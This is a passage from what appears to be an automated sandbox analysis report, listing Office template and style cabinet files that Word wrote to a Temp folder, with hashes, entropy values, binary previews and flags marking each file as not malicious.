                                        Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                        C:\Users\user\AppData\Local\Temp\cab8861.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31482
                                        Entropy (8bit):7.808057272318224
                                        Encrypted:false
                                        SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                        MD5:F10DF902980F1D5BEEA96B2C668408A7
                                        SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                        SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                        SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                        Malicious:false
                                        Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                        C:\Users\user\AppData\Local\Temp\cab8862.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21111
                                        Entropy (8bit):7.6297992466897675
                                        Encrypted:false
                                        SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                        MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                        SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                        SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                        SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                        Malicious:false
                                        Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                        C:\Users\user\AppData\Local\Temp\cab8863.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31083
                                        Entropy (8bit):7.814202819173796
                                        Encrypted:false
                                        SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                        MD5:89A9818E6658D73A73B642522FF8701F
                                        SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                        SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                        SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                        Malicious:false
                                        Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                        C:\Users\user\AppData\Local\Temp\cab8874.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):34816
                                        Entropy (8bit):7.840826397575377
                                        Encrypted:false
                                        SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                        MD5:62863124CDCDA135ECC0E722782CB888
                                        SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                        SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                        SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                        Malicious:false
                                        Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                        C:\Users\user\AppData\Local\Temp\cab8875.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22594
                                        Entropy (8bit):7.674816892242868
                                        Encrypted:false
                                        SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                        MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                        SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                        SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                        SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                        Malicious:false
                                        Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                        C:\Users\user\AppData\Local\Temp\cab8876.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21791
                                        Entropy (8bit):7.65837691872985
                                        Encrypted:false
                                        SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                        MD5:7BF88B3CA20EB71ED453A3361908E010
                                        SHA1:F75F86557051160507397F653D7768836E3B5655
                                        SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                        SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                        Malicious:false
                                        Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                        C:\Users\user\AppData\Local\Temp\cab8877.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):19288
                                        Entropy (8bit):7.570850633867256
                                        Encrypted:false
                                        SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                        MD5:B9A6FF715719EE9DE16421AB983CA745
                                        SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                        SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                        SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                        Malicious:false
                                        Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                        C:\Users\user\AppData\Local\Temp\cab8878.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21875
                                        Entropy (8bit):7.6559132103953305
                                        Encrypted:false
                                        SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                        MD5:E532038762503FFA1371DF03FA2E222D
                                        SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                        SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                        SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                        Malicious:false
                                        Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                        C:\Users\user\AppData\Local\Temp\cab8879.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):26944
                                        Entropy (8bit):7.7574645319832225
                                        Encrypted:false
                                        SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                        MD5:F913DD84915753042D856CEC4E5DABA5
                                        SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                        SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                        SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                        Malicious:false
                                        Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                        C:\Users\user\AppData\Local\Temp\cab887A.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31605
                                        Entropy (8bit):7.820497014278096
                                        Encrypted:false
                                        SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                        MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                        SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                        SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                        SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                        Malicious:false
                                        Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                        C:\Users\user\AppData\Local\Temp\cab887B.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):43653
                                        Entropy (8bit):7.899157106666598
                                        Encrypted:false
                                        SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                        MD5:DA3380458170E60CBEA72602FDD0D955
                                        SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                        SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                        SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                        Malicious:false
                                        Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                        C:\Users\user\AppData\Local\Temp\cab887C.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):35519
                                        Entropy (8bit):7.846686335981972
                                        Encrypted:false
                                        SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                        MD5:53EE9DA49D0B84357038ECF376838D2E
                                        SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                        SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                        SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                        Malicious:false
                                        Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                        C:\Users\user\AppData\Local\Temp\cab887E.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):33610
                                        Entropy (8bit):7.8340762758330476
                                        Encrypted:false
                                        SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                        MD5:51804E255C573176039F4D5B55C12AB2
                                        SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                        SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                        SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                        Malicious:false
